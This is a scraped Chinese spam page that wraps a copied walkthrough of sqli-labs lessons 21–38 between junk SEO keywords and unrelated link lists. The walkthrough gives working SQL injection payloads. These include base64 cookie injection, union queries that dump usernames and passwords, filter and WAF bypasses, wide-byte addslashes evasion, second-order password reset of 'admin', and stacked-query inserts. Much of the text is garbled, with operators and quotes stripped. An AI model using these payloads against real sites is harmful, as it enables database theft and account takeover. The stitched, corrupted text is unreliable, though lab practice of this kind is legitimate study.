当前位置: 首页 > news >正文

wish网站应该怎么做怎么做网络销售的网站

wish网站应该怎么做,怎么做网络销售的网站,上海开发app,东莞市非凡网站建设Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入) base64编码#xff0c;单引号#xff0c;报错型#xff0c;cookie型注入。 本关和less-20相似#xff0c;只是cookie的uname值经过base64编码了。 登录后页面#xff1a;…Less-21 Cookie Injection- Error Based- complex - string ( 基于错误的复杂的字符型Cookie注入) base64编码单引号报错型cookie型注入。 本关和less-20相似只是cookie的uname值经过base64编码了。 登录后页面 mV0L3dlaXhpbl80NTY5NDM4OA,size_16,color_FFFFFF,t_70) cookie的地方显然是base64加密过的解码得到admin就是刚才登陆的uname所以猜测本题在cookie处加密了字符串 查看php文件确实如此所以只需要上传paylaod的时候base64加密一下就可以了。 抓包 %3d为url编码的 号 测试payloa admin and 11 -- //明文 YWRtaW4nIGFuZCAxPTEgLS0r //密文存在报错回显即注入点 爆数据库 -admin) union select 1,2,database()# //明文 LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw //密文剩下和less20 相同 less22base64编码双引号报错型cookie型注入。 单引号换双引号 其余操作相同 -admin union select 1,2,database()# LWFkbWluIiB1bmlvbiBzZWxlY3QgMSwyLGRhdGFiYXNlKCkjless23过滤注释 源码 可看到源码过滤了注释符 构造闭合型语句 爆库 ?id union select 1,2,database() 爆表 ?id union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase() or 1 爆列名 ?id union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers or 1 爆字段值 ?id union select 1,group_concat(username),group_concat(password) from users where 1 or 1 less24二次注入 注册一个账号名为admin’#密码设为admin 登陆选择重置密码 重置密码为123456 此时执行语句为 UPDATE users SET passwdNew_Pass WHERE username admin # AND password但因为admin’# 的闭合和注释 实际执行为 UPDATE users SET passwdNew_Pass WHERE username admin即通过带有特殊字符的语句在修改密码的语句当中把语句变成了修改目标账号的密码 注入完成 less25Trick with OR AND (过滤了or和and) 双写绕过 ?id0 oorr 11 -- ?id2 aandnd 11 --less 26过滤了注释和空格的注入 查源码 if(isset($_GET[id])) {$id$_GET[id];//logging the connection parameters to a file for analysis.$fpfopen(result.txt,a);fwrite($fp,ID:.$id.\n);fclose($fp);//fiddling with comments$id blacklist($id);//echo br;//echo $id;//echo br;$hint$id;// connectivity $sqlSELECT * FROM users WHERE id$id LIMIT 0,1;$resultmysql_query($sql);$row mysql_fetch_array($result);if($row){echo font size5 color #99FF00; echo Your Login name:. $row[username];echo br;echo Your Password: .$row[password];echo /font;}else {echo font color #FFFF00;print_r(mysql_error());echo /font; } }else { echo Please input the ID as parameter with numeric value;}function blacklist($id) {$id preg_replace(/or/i,, $id); //strip out OR (non case sensitive)$id preg_replace(/and/i,, $id); //Strip out AND (non case sensitive)$id preg_replace(/[\/\*]/,, $id); //strip out /*$id preg_replace(/[--]/,, $id); //Strip out --$id preg_replace(/[#]/,, $id); //Strip out #$id preg_replace(/[\s]/,, $id); //Strip out spaces$id preg_replace(/[\/\\\\]/,, $id); //Strip out slashesreturn $id; }过滤了 orand /* , – , # , 空格 , / 空格替代 %09 TAB键水平 %0a 新建一行 %0c 新的一页 %0d return功能 %0b TAB键垂直这道题还可以使用盲注实现 0||left(database(),1)s%26%2611同样报错注入也可以实现 0||updatexml(1,concat(0x7e,(Select%0aversion),0x7e),1)||11只要将空格和and绕过 那么实现就简单了 or和and 很好过滤注释过滤了就使用永真闭合 less26a过滤了空格和注释的盲注 和上一题区别不大 通过检测 0’||‘1’‘1 判断是’ 也可以通过fuzz去查看 发现 ) 无报错 使用盲注ok 0’||left(database(),1)‘s’%26%26’1’1 尝试绕过这两个都可以绕过 0’)%a0union%a0select%a01,2,3||(‘1 0’)%a0union%a0select%a01,2,3;%00 虽然这道题说是盲注但是通过闭合 也可以直接爆出结果。 less27(过滤了注释和空格的注入) 做了这么多了下来就不说如何拿到数据了重点在于如何绕过只要能够找到注入点剩下的可以利用sqlmap 等等工具直接利用毕竟在渗透中没有那么多的时间让我们去消耗 过滤了union和select 绕过方式双写 大小写 0’%0aUnioN%0aSeleCT%0a1,2,3;%00 0’%A0UnIoN%A0SeLeCt(1),2,3%26%26%a0’1 这里说明一下冒号可以做闭合用 %00用来截断 这样和注释有相同的含义这下绕过就多了注释分号闭合冒号%00截断 Less-27a 过滤了union和select 方法1: 和上一题一样但是把单引号换成了双引号 替换上一题的payload即可绕过 方法2 爆数据库 http://10.10.10.141/sql/Less-27a/?id1%a0And%a0(length(database())8)%a0uNion%a0sELect%a01,database(),“3 爆表名 http://10.10.10.141/sql/Less-27a/?id1”%a0And%a0(length(database())8)%a0uNion%a0sELect%a01,(group_concat(table_name)),3%a0from%a0information_schema.tables%a0where%a0table_schema‘security’%a0%26%26%a01%a0“1 查字段名 http://10.10.10.141/sql/Less-27a/?id1”%a0And%a0(length(database())8)%a0uNion%a0sELect%a01,(group_concat(column_name)),3%a0from%a0information_schema.columns%a0where%a0table_schema‘security’%a0And%a0table_name‘users’%26%26%a01%a0“1 查数据 http://10.10.10.141/sql/Less-27a/?id-1”%a0And%a0(length(database())8)%a0UNion%a0SElect%a0(1),(group_concat(username)),(3)from%a0users%a0UNion%a0SElect%a01,2,“3”3 less28过滤了union和select大小写 没有报错 盲注 过滤了大小写 但是可以整体双写 less28a滤了union和select大小写 过滤大小写但是过滤不严格 类似于28 这里可以使用注释 0)%A0UnIoN%A0SeLeCt(1),version(),database() --less29 获取-基于错误的缺乏证据的不匹配-在web应用程序前面有一个WAF。 大佬的解释 http://blog.csdn.net/nzjdsds/article/details/77758824 waf是只允许输入数字的我们在输入数字的时候先给waf看然后检测正常后才转发给我们需要访问的页面这里我弄2个值一个是用来欺骗waf的。另一个才是给我们需要访问页面的 注入 ?id1id-1 union select 1,2,database() --less30有waf的盲注 参考less29 ?id1id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()--Less-31 Protection with WAF 有waf防护 ?id1id-1)union select 1,2,database() --less32bypass Addslashes() 绕过 addslashes() 宽字节绕过引号转义 addslashes()会在单引号前加一个\ 例如I’m hacker 传入addslashes()得到I’m hacker 本题想以此阻止sql注入语句闭合但是可以使用宽字节绕过 原理大概来说就是一个双字节组成的字符比如一个汉字‘我’的utf8编码为%E6%88%91 当我们使用?id-1%E6’ 这样的构造时’ 前面加的 \ 就会和%E6 合在一起但是又不是一个正常汉字但是起到了注掉 \ 的作用库。 样例payload ?id-1%E6 union select 1,version(),database() --我在爆列名的时候卡了一下分析半天语句最后想起来了 ‘users’ 这里有单引号。 使用十六进制编码就可以绕过了’使用0x 代替users 使用十六进制编码得到7573657273构造为0x7573657273 ?id-1%E6 union select 1,version(),group_concat(column_name) from information_schema.columns where table_name 0x7573657273--接下来的步骤比较简单不再赘述。 注入完成。 less33Bypass Add SLASHES 和33一模一样 less34Bypass Add SLASHES 绕过添加斜杠 和上一关差别不大使用post请求 一样的宽字节注入并且在uname和passwd处都存在注入 post方式抓包提交。 样例payload unameadmin%99 union select version(),database()--passwdadminsubmitSubmit爆列名的时候要注意’users’的转义。 注入结束。 less35 GET-Bypass添加斜杠 为什么要关心addslashes() 测试payload ?id1’ id周围没有单引号或双引号现在就明白题目的标题了不需要要过直接注入无比简单不再赘述。 样例payload ?id-1 union select 1,version(),database()– Less-36 宽字节注入GET-Bypass MySQLreal escape_string 先来看看这个函数 mysql_real_escape_string() 函数转义 SQL 语句中使用的字符串中的特殊字符。 下列字符受影响 \x00 \n \r \\x1a如果成功则该函数返回被转义的字符串。如果失败则返回 false。 而这个函数可以通过以下语句绕过 aaa’ OR 11 – 0%df’ union select 1,2,database() -- Less-37宽字节注入 到了后面主要讲思路语句基本都会了 这里是post方式我们抓包 添加语句到uname或者passwd中同样是添加’%df报错查询 --做注释 uname0%df union select 1,database() --passwdadminsubmitSubmit成功绕过 Less-38 层次化查询 可以直接正常注入 主要看下这个函数 mysqli_more_results() 检查一个多重查询语句中是否有更多结果 堆叠注入也就是可以执行多条sql语句 /Less-38/?id1;insert into users(id,username,password) values (38,less38,hello)--
http://www.zqtcl.cn/news/397351/

相关文章:

  • 活泼风格的网站crm免费客户管理系统
  • 网站系统发生错误百度seo灰色词排名代发
  • 免费做名片儿的网站wordpress grace6
  • 有关网站开发的创意四川工程造价信息网官网
  • 网站目录结构北京注册公司地址可以是住宅吗
  • 龙信建设集团网站傻瓜式建站软件下载
  • 在360做网站和百度做网站的区别什么是网站地址
  • 营销型的物流网站模板下载长江设计公司
  • 网站程序制作购买网站域名
  • 网站建设中html下载如何用社交网站开发客户
  • 开设购物网站的方案政务公开和网站建设情况
  • 一台云服务器做多个网站营销型网站的建设重点是什么
  • 泉港网站建设推广服务公司电子商务好就业吗
  • 自己做网站开发如何找客户wordpress 显示 子分类
  • 腾讯邮箱网页版登录宿迁seo公司
  • 网站建设找盖亚科技WordPress 百度 主动
  • 中国最受欢迎的网站杭州做电商网站
  • 百度招聘 网站开发全网营销实战培训
  • 备案网站内容说明广州哪个区封了
  • 大足建网站的软件开发者模式怎么打开
  • 中国有什么网站做跨境零售农商1号的网站建设费
  • 用宝塔给远程网站做备份购买一个网站需要多少钱
  • 百度蜘蛛不爬取网站做汽车新闻哪个网站好
  • 三维建设项目管理网站免费下载网站模板
  • 淘客联盟做任务网站页面设计所遵循的原则有哪些
  • 怎么建设收费网站行业网站建站
  • 织梦园模板网站自适应网站建设服务哪家好
  • 优秀专题网站恩施北京网站建设
  • 常用网站后缀企业网站用什么域名
  • 网站建设定制公众号小程序51ppt模板免费下载完整版免费ppt